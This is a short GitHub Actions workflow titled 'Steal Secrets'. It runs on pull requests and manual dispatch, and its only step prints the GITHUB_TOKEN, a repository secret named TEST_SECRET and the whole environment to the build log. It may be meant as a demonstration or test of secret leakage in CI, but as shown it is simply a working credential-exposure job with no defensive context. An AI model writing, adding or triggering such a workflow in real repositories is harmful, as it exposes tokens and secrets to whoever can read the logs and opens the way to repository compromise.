name: Steal Secrets
on:
  pull_request:
  workflow_dispatch:
jobs:
  steal:
    runs-on: ubuntu-latest
    steps:
      - name: Print secrets
        run: |
          echo "GITHUB_TOKEN=${GITHUB_TOKEN}"
          echo "SECRET_1=${{ secrets.TEST_SECRET }}"
          echo "ALL_ENV=$(env)"
        env:
          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
